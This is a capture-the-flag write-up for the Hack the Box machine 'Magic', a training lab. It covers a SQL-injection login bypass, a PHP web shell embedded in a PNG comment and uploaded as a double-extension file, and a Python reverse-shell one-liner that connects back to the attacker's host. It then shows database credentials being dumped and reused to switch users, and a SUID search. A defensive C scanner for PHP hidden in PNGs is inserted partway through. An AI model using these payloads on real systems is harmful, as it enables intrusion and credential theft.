
[Hack the Box write-up] Magic

Introduction

I am a Hack the Box beginner.
If you have any corrections, additions or advice, please leave a comment or reach me on Twitter.
さんぽし (@sanpo_shiho) | Twitter

Cheat sheet

I keep notes on how to use the tools and so on as a cheat sheet at the link below; feel free to refer to it.
github | sanposhiho/MY_CHEAT_SHEET

About the machine

The difficulty is medium.
(Screenshot 2020-05-30 20.22.54.png)

Among the medium machines it is on the easier side.

nmap

kali@kali:~$ nmap -sC -sV 10.10.10.185 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 00:27 EDT
Nmap scan report for 10.10.10.185
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.92 seconds

Port 80

/index.php
(Screenshot 2020-05-30 13.29.19.png)

/login.php
(Screenshot 2020-05-30 14.00.50.png)

Login via SQLi

Entering ' in the username field of the login form gives a different response from a failed login (specifically, you are simply returned to the login form).

Suspecting SQLi, I tried a few things.

Intercept the request in Burp and rewrite it as follows.

(Screenshot 2020-05-30 14.02.23.png)

Switching intercept off then gives

(Screenshot 2020-05-30 14.02.36.png)

and the login succeeds.
Some kind of image upload screen appears.

Embedding PHP in the image's EXIF

I was stuck for quite a while after the SQLi, but

do you know an image can hide a lot of information? Maybe you just need the right tool.

this comment on the forum finally made it click (a few days earlier I had seen a challenge at a Recruit event that used EXIF in the same way...).

$ exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png

This makes the file take a query parameter named cmd and pass it to the shell.

The image is uploaded under a name of the form hoge.php.png (anything other than png is rejected).

Let's find where uploaded images end up, using gobuster.
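As an added example from the defender's side (not code from this write-up or from the Magic machine): a small C scanner for the trick above. It walks the PNG chunk list and flags text chunks (tEXt/iTXt/zTXt, which is where exiftool -Comment lands on a PNG) that contain a PHP open tag, and applies an upload-name policy that refuses double extensions such as test.php.png. The sample PNG is constructed inside the code; the extension allowlist and the rule that an unreadable zTXt chunk counts as suspect are assumed policy.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* CRC-32 as used by PNG chunks; only needed to build the constructed sample. */
static uint32_t png_crc(const unsigned char *p, size_t n) {
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        c ^= p[i];
        for (int k = 0; k < 8; k++) c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return ~c;
}

static void put_be32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}

static uint32_t get_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Append one chunk (length, type, data, crc) at out+pos; returns the new pos. */
static size_t add_chunk(unsigned char *out, size_t pos, const char *type,
                        const void *data, uint32_t n) {
    put_be32(out + pos, n);
    memcpy(out + pos + 4, type, 4);
    if (n) memcpy(out + pos + 8, data, n);
    put_be32(out + pos + 8 + n, png_crc(out + pos + 4, 4 + n));
    return pos + 12 + n;
}

/* Constructed sample, not a file from the machine: a 1x1 PNG whose tEXt "Comment"
 * chunk carries a PHP open tag, the shape exiftool -Comment writes. out >= 128 bytes. */
size_t build_sample_png(unsigned char *out) {
    static const unsigned char sig[8] = {0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};
    static const unsigned char ihdr[13] = {0, 0, 0, 1, 0, 0, 0, 1, 8, 2, 0, 0, 0};
    static const char comment[] = "Comment\0<?php phpinfo(); ?>";  /* NUL splits key/text */
    memcpy(out, sig, 8);
    size_t pos = add_chunk(out, 8, "IHDR", ihdr, sizeof ihdr);
    pos = add_chunk(out, pos, "tEXt", comment, sizeof comment - 1);
    return add_chunk(out, pos, "IEND", NULL, 0);
}

static bool has_php_tag(const unsigned char *d, size_t n) {
    for (size_t i = 0; i + 1 < n; i++)
        if (d[i] == '<' && d[i + 1] == '?') return true;  /* covers <?php and <?= */
    return false;
}

/* Walk the chunk list and count text chunks that look like they carry PHP. tEXt/iTXt
 * bytes are searched directly; zTXt is deflate-compressed, so this scanner treats it as
 * suspect rather than silently clean. Returns -1 for anything that is not a well-formed
 * PNG, which is itself a good reason to refuse the upload. */
int scan_png_text_chunks(const unsigned char *buf, size_t len) {
    static const unsigned char sig[8] = {0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};
    if (len < 8 || memcmp(buf, sig, 8) != 0) return -1;
    int hits = 0;
    for (size_t pos = 8;;) {
        if (len - pos < 12) return -1;              /* need length + type + crc */
        uint32_t n = get_be32(buf + pos);
        if (n > len - pos - 12) return -1;          /* chunk overruns the buffer */
        const unsigned char *type = buf + pos + 4, *data = buf + pos + 8;
        if (!memcmp(type, "tEXt", 4) || !memcmp(type, "iTXt", 4)) {
            if (has_php_tag(data, n)) hits++;
        } else if (!memcmp(type, "zTXt", 4)) {
            hits++;
        } else if (!memcmp(type, "IEND", 4)) {
            return hits;
        }
        pos += 12 + n;
    }
}

/* Upload name policy: no path separators, exactly one extension, allowlisted. test.php.png
 * is refused for its second dot, so a double extension never reaches Apache's handler mapping. */
bool upload_name_ok(const char *name) {
    static const char *const allow[] = {"png", "jpg", "jpeg"};   /* lowercase before calling */
    if (!name || strchr(name, '/') || strchr(name, '\\')) return false;
    const char *dot = strchr(name, '.');
    if (!dot || dot == name || strchr(dot + 1, '.')) return false;
    for (size_t i = 0; i < sizeof allow / sizeof allow[0]; i++)
        if (strcmp(dot + 1, allow[i]) == 0) return true;
    return false;
}

/* Build the sample and scan its first `keep` bytes (0 = the whole file). */
int scan_sample(size_t keep) {
    unsigned char png[128];
    size_t n = build_sample_png(png);
    return scan_png_text_chunks(png, keep && keep < n ? keep : n);
}

int main(void) {
    printf("flagged chunks: %d, truncated file: %d, test.php.png allowed: %d\n",
           scan_sample(0), scan_sample(20), upload_name_ok("test.php.png"));
    return 0;
}
```

A real upload handler would additionally re-encode the image (which drops every metadata chunk) and store it outside any directory Apache maps to a script handler.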

kali@kali:~$ gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/30 03:48:33 Starting gobuster
===============================================================
/login.php (Status: 200)
/index.php (Status: 200)
/images (Status: 301)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/purple.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/05/30 04:32:59 Finished
===============================================================
kali@kali:~$ gobuster dir -u http://10.10.10.185/images/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/images/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/30 04:33:45 Starting gobuster
===============================================================
/uploads (Status: 301)
===============================================================
2020/05/30 05:18:29 Finished
===============================================================

/images/uploads looks suspicious.

Upload from the screen shown earlier,

then take this ↓

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

URL-encode it and request the following URL:

http://10.10.10.185/images/uploads/test.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.4%22,1212));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

and you get a shell.

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.185] 40024
/bin/sh: 0: can't access tty; job control turned off
$ 

Getting user

www-data@ubuntu:/$ cd /var/www/Magic
cd /var/www/Magic
www-data@ubuntu:/var/www/Magic$ ls
ls
assets   images     login.php   purple.php
db.php5  index.php  logout.php  upload.php
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

I thought this would be the usual pattern of poking around in the DB, but the plain mysql command was not available.

www-data@ubuntu:/var/www/Magic$ ls -la /usr/bin/ | grep mysql
ls -la /usr/bin/ | grep mysql
-rwxr-xr-x  1 root root     3627200 Jan 21 06:10 mysql_config_editor
-rwxr-xr-x  1 root root    22558552 Jan 21 06:10 mysql_embedded
-rwxr-xr-x  1 root root     5179616 Jan 21 06:10 mysql_install_db
-rwxr-xr-x  1 root root     3616952 Jan 21 06:10 mysql_plugin
-rwxr-xr-x  1 root root     3784424 Jan 21 06:10 mysql_secure_installation
-rwxr-xr-x  1 root root     3653288 Jan 21 06:10 mysql_ssl_rsa_setup
-rwxr-xr-x  1 root root     3569976 Jan 21 06:10 mysql_tzinfo_to_sql
-rwxr-xr-x  1 root root     4442320 Jan 21 06:10 mysql_upgrade
-rwxr-xr-x  1 root root     3799752 Jan 21 06:10 mysqladmin
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqlanalyze -> mysqlcheck
-rwxr-xr-x  1 root root     4068280 Jan 21 06:10 mysqlbinlog
-rwxr-xr-x  1 root root     3825320 Jan 21 06:10 mysqlcheck
-rwxr-xr-x  1 root root       26952 Jan 21 06:10 mysqld_multi
-rwxr-xr-x  1 root root       28448 Jan 21 06:10 mysqld_safe
-rwxr-xr-x  1 root root     3875176 Jan 21 06:10 mysqldump
-rwxr-xr-x  1 root root        7865 Jan 21 06:10 mysqldumpslow
-rwxr-xr-x  1 root root     3791912 Jan 21 06:10 mysqlimport
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqloptimize -> mysqlcheck
-rwxr-xr-x  1 root root     4286120 Jan 21 06:10 mysqlpump
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqlrepair -> mysqlcheck
-rwxr-xr-x  1 root root       39016 Jan 12  2018 mysqlreport
-rwxr-xr-x  1 root root     3790504 Jan 21 06:10 mysqlshow
-rwxr-xr-x  1 root root     3809512 Jan 21 06:10 mysqlslap
www-data@ubuntu:/var/www/Magic$ 

Looking at the list, mysqldump seems usable.

www-data@ubuntu:/var/www/Magic$ mysqldump --databases Magic -utheseus -piamkingtheseus
<qldump --databases Magic -utheseus -piamkingtheseus
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version       5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `Magic`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-05-29 23:43:16

INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng'); looks suspicious.

www-data@ubuntu:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/var/www/Magic$

I was able to escalate to theseus. That gets user.

PE

Look for SUID files.

theseus@ubuntu:~$  find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/snap/core18/1223/bin/mount
/snap/core18/1223/bin/ping
/snap/core18/1223/bin/su
/snap/core18/1223/bin/umount
/snap/core18/1223/usr/bin/chfn
/snap/core18/1223/usr/bin/chsh
/snap/core18/1223/usr/bin/gpasswd
/snap/core18/1223/usr/bin/newgrp
/snap/core18/1223/usr/bin/passwd
/snap/core18/1223/usr/bin/sudo
/snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1223/usr/lib/openssh/ssh-keysign
/snap/core18/1668/bin/mount
/snap/core18/1668/bin/ping
/snap/core18/1668/bin/su
/snap/core18/1668/bin/umount
/snap/core18/1668/usr/bin/chfn
/snap/core18/1668/usr/bin/chsh
/snap/core18/1668/usr/bin/gpasswd
/snap/core18/1668/usr/bin/newgrp
/snap/core18/1668/usr/bin/passwd
/snap/core18/1668/usr/bin/sudo
/snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1668/usr/lib/openssh/ssh-keysign
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd
/snap/core/7917/bin/mount
/snap/core/7917/bin/ping
/snap/core/7917/bin/ping6
/snap/core/7917/bin/su
/snap/core/7917/bin/umount
/snap/core/7917/usr/bin/chfn
/snap/core/7917/usr/bin/chsh
/snap/core/7917/usr/bin/gpasswd
/snap/core/7917/usr/bin/newgrp
/snap/core/7917/usr/bin/passwd
/snap/core/7917/usr/bin/sudo
/snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7917/usr/lib/openssh/ssh-keysign
/snap/core/7917/usr/lib/snapd/snap-confine
/snap/core/7917/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping

Hmm...?

Focusing on sysinfo

This is another hint I took from the forum: sysinfo sounds like a command that should exist, but it doesn't, right?
So this must be a custom command.

root@ubuntu:/tmp# sysinfo
sysinfo
====================Hardware Info====================
H/W path           Device      Class      Description
=====================================================
                               system     VMware Virtual Platform
/0                             bus        440BX Desktop Reference Platform
/0/0                           memory     86KiB BIOS
/0/1                           processor  AMD EPYC 7401P 24-Core Processor
/0/1/0                         memory     16KiB L1 cache
/0/1/1                         memory     16KiB L1 cache
/0/1/2                         memory     512KiB L2 cache
/0/1/3                         memory     512KiB L2 cache
/0/2                           processor  AMD EPYC 7401P 24-Core Processor
/0/28                          memory     System Memory
/0/28/0                        memory     4GiB DIMM DRAM EDO
/0/28/1                        memory     DIMM DRAM [empty]
/0/28/2                        memory     DIMM DRAM [empty]
/0/28/3                        memory     DIMM DRAM [empty]
/0/28/4                        memory     DIMM DRAM [empty]
/0/28/5                        memory     DIMM DRAM [empty]
/0/28/6                        memory     DIMM DRAM [empty]
/0/28/7                        memory     DIMM DRAM [empty]
/0/28/8                        memory     DIMM DRAM [empty]
/0/28/9                        memory     DIMM DRAM [empty]
/0/28/a                        memory     DIMM DRAM [empty]
/0/28/b                        memory     DIMM DRAM [empty]
/0/28/c                        memory     DIMM DRAM [empty]
/0/28/d                        memory     DIMM DRAM [empty]
/0/28/e                        memory     DIMM DRAM [empty]
/0/28/f                        memory     DIMM DRAM [empty]
/0/28/10                       memory     DIMM DRAM [empty]
/0/28/11                       memory     DIMM DRAM [empty]
/0/28/12                       memory     DIMM DRAM [empty]
/0/28/13                       memory     DIMM DRAM [empty]
/0/28/14                       memory     DIMM DRAM [empty]
/0/28/15                       memory     DIMM DRAM [empty]
/0/28/16                       memory     DIMM DRAM [empty]
/0/28/17                       memory     DIMM DRAM [empty]
/0/28/18                       memory     DIMM DRAM [empty]
/0/28/19                       memory     DIMM DRAM [empty]
/0/28/1a                       memory     DIMM DRAM [empty]
/0/28/1b                       memory     DIMM DRAM [empty]
/0/28/1c                       memory     DIMM DRAM [empty]
/0/28/1d                       memory     DIMM DRAM [empty]
/0/28/1e                       memory     DIMM DRAM [empty]
/0/28/1f                       memory     DIMM DRAM [empty]
/0/28/20                       memory     DIMM DRAM [empty]
/0/28/21                       memory     DIMM DRAM [empty]
/0/28/22                       memory     DIMM DRAM [empty]
/0/28/23                       memory     DIMM DRAM [empty]
/0/28/24                       memory     DIMM DRAM [empty]
/0/28/25                       memory     DIMM DRAM [empty]
/0/28/26                       memory     DIMM DRAM [empty]
/0/28/27                       memory     DIMM DRAM [empty]
/0/28/28                       memory     DIMM DRAM [empty]
/0/28/29                       memory     DIMM DRAM [empty]
/0/28/2a                       memory     DIMM DRAM [empty]
/0/28/2b                       memory     DIMM DRAM [empty]
/0/28/2c                       memory     DIMM DRAM [empty]
/0/28/2d                       memory     DIMM DRAM [empty]
/0/28/2e                       memory     DIMM DRAM [empty]
/0/28/2f                       memory     DIMM DRAM [empty]
/0/28/30                       memory     DIMM DRAM [empty]
/0/28/31                       memory     DIMM DRAM [empty]
/0/28/32                       memory     DIMM DRAM [empty]
/0/28/33                       memory     DIMM DRAM [empty]
/0/28/34                       memory     DIMM DRAM [empty]
/0/28/35                       memory     DIMM DRAM [empty]
/0/28/36                       memory     DIMM DRAM [empty]
/0/28/37                       memory     DIMM DRAM [empty]
/0/28/38                       memory     DIMM DRAM [empty]
/0/28/39                       memory     DIMM DRAM [empty]
/0/28/3a                       memory     DIMM DRAM [empty]
/0/28/3b                       memory     DIMM DRAM [empty]
/0/28/3c                       memory     DIMM DRAM [empty]
/0/28/3d                       memory     DIMM DRAM [empty]
/0/28/3e                       memory     DIMM DRAM [empty]
/0/28/3f                       memory     DIMM DRAM [empty]
/0/3                           memory     
/0/3/0                         memory     DIMM [empty]
/0/4                           memory     
/0/4/0                         memory     DIMM [empty]
/0/5                           memory     
/0/5/0                         memory     DIMM [empty]
/0/6                           memory     
/0/6/0                         memory     DIMM [empty]
/0/7                           memory     
/0/7/0                         memory     DIMM [empty]
/0/8                           memory     
/0/8/0                         memory     DIMM [empty]
/0/9                           memory     
/0/9/0                         memory     DIMM [empty]
/0/a                           memory     
/0/a/0                         memory     DIMM [empty]
/0/b                           memory     
/0/b/0                         memory     DIMM [empty]
/0/c                           memory     
/0/c/0                         memory     DIMM [empty]
/0/d                           memory     
/0/d/0                         memory     DIMM [empty]
/0/e                           memory     
/0/e/0                         memory     DIMM [empty]
/0/f                           memory     
/0/f/0                         memory     DIMM [empty]
/0/10                          memory     
/0/10/0                        memory     DIMM [empty]
/0/11                          memory     
/0/11/0                        memory     DIMM [empty]
/0/12                          memory     
/0/12/0                        memory     DIMM [empty]
/0/13                          memory     
/0/13/0                        memory     DIMM [empty]
/0/14                          memory     
/0/14/0                        memory     DIMM [empty]
/0/15                          memory     
/0/15/0                        memory     DIMM [empty]
/0/16                          memory     
/0/16/0                        memory     DIMM [empty]
/0/17                          memory     
/0/17/0                        memory     DIMM [empty]
/0/18                          memory     
/0/18/0                        memory     DIMM [empty]
/0/19                          memory     
/0/19/0                        memory     DIMM [empty]
/0/1a                          memory     
/0/1a/0                        memory     DIMM [empty]
/0/1b                          memory     
/0/1b/0                        memory     DIMM [empty]
/0/1c                          memory     
/0/1c/0                        memory     DIMM [empty]
/0/1d                          memory     
/0/1d/0                        memory     DIMM [empty]
/0/1e                          memory     
/0/1e/0                        memory     DIMM [empty]
/0/1f                          memory     
/0/1f/0                        memory     DIMM [empty]
/0/20                          memory     
/0/20/0                        memory     DIMM [empty]
/0/21                          memory     
/0/21/0                        memory     DIMM [empty]
/0/22                          memory     
/0/22/0                        memory     DIMM [empty]
/0/23                          memory     
/0/23/0                        memory     DIMM [empty]
/0/24                          memory     
/0/24/0                        memory     DIMM [empty]
/0/25                          memory     
/0/25/0                        memory     DIMM [empty]
/0/26                          memory     
/0/26/0                        memory     DIMM [empty]
/0/27                          memory     
/0/27/0                        memory     DIMM [empty]
/0/29                          memory     
/0/29/0                        memory     DIMM [empty]
/0/2a                          memory     
/0/2a/0                        memory     DIMM [empty]
/0/2b                          memory     
/0/2b/0                        memory     DIMM [empty]
/0/2c                          memory     
/0/2c/0                        memory     DIMM [empty]
/0/2d                          memory     
/0/2d/0                        memory     DIMM [empty]
/0/2e                          memory     
/0/2e/0                        memory     DIMM [empty]
/0/2f                          memory     
/0/2f/0                        memory     DIMM [empty]
/0/30                          memory     
/0/30/0                        memory     DIMM [empty]
/0/31                          memory     
/0/31/0                        memory     DIMM [empty]
/0/32                          memory     
/0/32/0                        memory     DIMM [empty]
/0/33                          memory     
/0/33/0                        memory     DIMM [empty]
/0/34                          memory     
/0/34/0                        memory     DIMM [empty]
/0/35                          memory     
/0/35/0                        memory     DIMM [empty]
/0/36                          memory     
/0/36/0                        memory     DIMM [empty]
/0/37                          memory     
/0/37/0                        memory     DIMM [empty]
/0/38                          memory     
/0/38/0                        memory     DIMM [empty]
/0/39                          memory     
/0/39/0                        memory     DIMM [empty]
/0/3a                          memory     
/0/3a/0                        memory     DIMM [empty]
/0/3b                          memory     
/0/3b/0                        memory     DIMM [empty]
/0/3c                          memory     
/0/3c/0                        memory     DIMM [empty]
/0/3d                          memory     
/0/3d/0                        memory     DIMM [empty]
/0/3e                          memory     
/0/3e/0                        memory     DIMM [empty]
/0/3f                          memory     
/0/3f/0                        memory     DIMM [empty]
/0/40                          memory     
/0/40/0                        memory     DIMM [empty]
/0/41                          memory     
/0/41/0                        memory     DIMM [empty]
/0/42                          memory     
/0/42/0                        memory     DIMM [empty]
/0/43                          memory     
/0/43/0                        memory     DIMM [empty]
/0/44                          memory     
/0/45                          memory     
/0/100                         bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1                       bridge     440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7                       bridge     82371AB/EB/MB PIIX4 ISA
/0/100/7.1                     storage    82371AB/EB/MB PIIX4 IDE
/0/100/7.3                     bridge     82371AB/EB/MB PIIX4 ACPI
/0/100/7.7                     generic    Virtual Machine Communication Interface
/0/100/f                       display    SVGA II Adapter
/0/100/10          scsi2       storage    53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI
/0/100/10/0.0.0    /dev/sda    disk       21GB Virtual disk
/0/100/10/0.0.0/1  /dev/sda1   volume     19GiB EXT4 volume
/0/100/11                      bridge     PCI bridge
/0/100/11/0                    bus        USB1.1 UHCI Controller
/0/100/11/0/1      usb2        bus        UHCI Host Controller
/0/100/11/0/1/1                input      VMware Virtual USB Mouse
/0/100/11/0/1/2                bus        VMware Virtual USB Hub
/0/100/11/1                    bus        USB2 EHCI Controller
/0/100/11/1/1      usb1        bus        EHCI Host Controller
/0/100/15                      bridge     PCI Express Root Port
/0/100/15/0        ens160      network    VMXNET3 Ethernet Controller
/0/100/15.1                    bridge     PCI Express Root Port
/0/100/15.2                    bridge     PCI Express Root Port
/0/100/15.3                    bridge     PCI Express Root Port
/0/100/15.4                    bridge     PCI Express Root Port
/0/100/15.5                    bridge     PCI Express Root Port
/0/100/15.6                    bridge     PCI Express Root Port
/0/100/15.7                    bridge     PCI Express Root Port
/0/100/16                      bridge     PCI Express Root Port
/0/100/16.1                    bridge     PCI Express Root Port
/0/100/16.2                    bridge     PCI Express Root Port
/0/100/16.3                    bridge     PCI Express Root Port
/0/100/16.4                    bridge     PCI Express Root Port
/0/100/16.5                    bridge     PCI Express Root Port
/0/100/16.6                    bridge     PCI Express Root Port
/0/100/16.7                    bridge     PCI Express Root Port
/0/100/17                      bridge     PCI Express Root Port
/0/100/17.1                    bridge     PCI Express Root Port
/0/100/17.2                    bridge     PCI Express Root Port
/0/100/17.3                    bridge     PCI Express Root Port
/0/100/17.4                    bridge     PCI Express Root Port
/0/100/17.5                    bridge     PCI Express Root Port
/0/100/17.6                    bridge     PCI Express Root Port
/0/100/17.7                    bridge     PCI Express Root Port
/0/100/18                      bridge     PCI Express Root Port
/0/100/18.1                    bridge     PCI Express Root Port
/0/100/18.2                    bridge     PCI Express Root Port
/0/100/18.3                    bridge     PCI Express Root Port
/0/100/18.4                    bridge     PCI Express Root Port
/0/100/18.5                    bridge     PCI Express Root Port
/0/100/18.6                    bridge     PCI Express Root Port
/0/100/18.7                    bridge     PCI Express Root Port
/0/46              scsi0       storage    
/0/46/0.0.0        /dev/cdrom  disk       VMware IDE CDR00
/1                             system     

====================Disk Info====================
Disk /dev/loop0: 44.9 MiB, 47063040 bytes, 91920 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop1: 3.7 MiB, 3825664 bytes, 7472 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop2: 3.7 MiB, 3862528 bytes, 7544 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop3: 89.1 MiB, 93454336 bytes, 182528 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


